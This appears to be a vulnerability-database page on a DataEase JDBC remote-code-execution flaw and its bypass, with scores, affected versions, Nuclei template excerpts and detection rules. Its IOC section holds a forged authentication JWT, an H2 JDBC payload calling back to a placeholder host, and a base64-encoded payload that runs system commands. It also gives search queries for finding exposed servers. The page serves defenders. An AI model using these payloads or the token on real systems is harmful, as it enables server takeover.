CVE-2025-32966
published 2025-04-23CVE-2025-32966: DataEase is an open-source BI tool alternative to Tableau. Prior to version 2.10.8, authenticated users can complete RCE through the backend JDBC link. This…
PriorityP268critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
3.92%
89.0th percentile
DataEase is an open-source BI tool alternative to Tableau. Prior to version 2.10.8, authenticated users can complete RCE through the backend JDBC link. This issue has been patched in version 2.10.8.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dataease | dataease | < 2.10.10 | 2.10.10 |
| dataease | dataease | < 2.10.10 | 2.10.10 |
| dataease | dataease | < 2.10.8 | 2.10.8 |
Detection & IOCsextracted from sources · hover to see the quote
cookieX-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8↗
otherjdbc:h2:mem:pwn;MODE=MSSQLServer;INIT=CREATE ALIAS LK AS $$void lk() throws java.io.IOException { java.net.InetAddress.getByName("{{unique}}")\; }$$\;CALL LK()
othereyJkYXRhQmFzZSI6IiIsImpkYmMiOiJqZGJjOmgyOm1lbTp0ZXN0O2luXFxpdD1EUk9QIEFMSUFTIElGIEVYSVNUUyBFWEVDXFw7Q1JFQVRcXEUgQUxJQVMgRVhFQyBBUyAkJHZvaWQgZXhlYygpIHRocm93cyBFeGNlcHRpb24ge2phdmEubGFuZy5TdHJpbmcgcyA9IG5ldyBqYXZhLnV0aWwuU2Nhbm5lcihqYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhcImlkXCIpLmdldElucHV0U3RyZWFtKCkpLnVzZURlbGltaXRlcihcIlxcQVwiKS5uZXh0KClcXDt0aHJvdyBuZXcgamF2YS5sYW5nLkV4Y2VwdGlvbihzKVxcO30kJFxcO0NBTEwgRVhFQygpXFw7IiwidXJsVHlwZSI6ImpkYmNVcmwiLCJzc2hUeXBlIjoicGFzc3dvcmQiLCJleHRyYVBhcmFtcyI6IiIsInVzZXJuYW1lIjoiMTIzIiwiIHBhc3N3b3JkIjoiMTIzIiwiaG9zdCI6IiIsImF1dGhNZXRob2QiOiIiLCJwb3J0IjowLCJpbml0aWFsUG9vbFNpemUiOjUsIm1pblBvb2xTaXplIjo1LCJtYXhQb29sU2l6ZSI6NSwicXVlcnlUaW1lb3V0IjozMH0↗
- →Detect exploit attempts by matching HTTP POST requests to /de2api/datasource/validate or /de2api/datasource/getSchema containing H2 JDBC strings (jdbc:h2:mem:) with INIT, RUNSCRIPT, or case-variant equivalents (e.g., in\it) in the request body or base64-encoded configuration field. ↗
- →Alert on responses from DataEase datasource endpoints containing 'Exception calling user-defined function' combined with 'CREATE ALIAS', which indicates successful H2 JDBC code execution.
- →Flag requests to DataEase datasource API endpoints bearing a forged or static X-DE-TOKEN JWT header (especially with uid:1, oid:1 claims and HS256 algorithm signed with weak/known keys such as 'ChrisJr404').
- →Use FOFA query 'app="FIT2CLOUD-DataEase"' or Shodan query 'http.html:"DataEase"' to identify exposed DataEase instances for proactive scanning. ↗
- →The bypass (CVE-2025-49002) works by using mixed-case variants of blocked keywords (e.g., 'in\it' instead of 'INIT', 'CREAT\E' instead of 'CREATE') to evade case-sensitive blocklists; detection rules should be case-insensitive. ↗
- ·The static JWT token used in the CVE-2025-49002 PoC (X-DE-TOKEN with uid:1, oid:1) relies on a weak/default HMAC secret. Deployments using a non-default JWT secret will require a valid authenticated token for exploitation, meaning unauthenticated exploitation depends on a known or guessable secret. ↗
- ·CVE-2025-32966 originally required user authentication ('exploit requires user authentication'), but the related bypass CVE-2025-49002 template uses a forged JWT, suggesting the authentication control may be bypassable with a known/weak signing key.
- ·The CVE-2025-49002 Nuclei template is described as non-invasive and does not attempt authentication bypass, JDBC exploitation, or command execution — it is for version-hint detection only; the embedded base64 payload in the template does contain a full RCE payload and should be treated as sensitive. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.08.2HIGHCVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No advisories linked to this vulnerability.
No detection rules found.
Nuclei
DataEase - Remote Code Execution
nuclei·CVSS 8.2
CVE-2025-49002 [HIGH] DataEase - Remote Code Execution
DataEase - Remote Code Execution
DataEase is an open-source business intelligence and data visualization platform. Public advisories state that CVE-2025-49002 is related to a bypass in the previous fix for CVE-2025-32966 involving case-insensitive handling of restricted H2 JDBC keywords. This template is a non-invasive detection template intended only to identify exposed DataEase instances and extract possible version hints for manual verification. It does not attempt authentication bypass, JDBC exploitation, or command execution.
Template:
id: CVE-2025-49002
info:
name: DataEase - Remote Code Execution
author: WeQi
severity: high
description: |
DataEase is an open-source business intelligence and data visualization platform. Public advisories state that CVE-2025-49002 is related to a
Nuclei
DataEase 2.10.4-2.10.7 - Remote Code Execution
nuclei·CVSS 8.2
CVE-2025-32966 [HIGH] DataEase 2.10.4-2.10.7 - Remote Code Execution
DataEase 2.10.4-2.10.7 - Remote Code Execution
DataEase prior to version 2.10.8 contains a remote code execution caused by insecure backend JDBC link handling, letting authenticated users execute arbitrary code, exploit requires user authentication.
Template:
id: CVE-2025-32966
info:
name: DataEase 2.10.4-2.10.7 - Remote Code Execution
author: ChrisJr404
severity: critical
description: |
DataEase prior to version 2.10.8 contains a remote code execution caused by insecure backend JDBC link handling, letting authenticated users execute arbitrary code, exploit requires user authentication.
impact: |
Authenticated users can execute arbitrary code on the server, potentially leading to full system compromise.
remediation: |
Update to version 2.10.8 or later.
reference:
- https://github.com/d
No writeups or analysis indexed.
2025-04-23
Published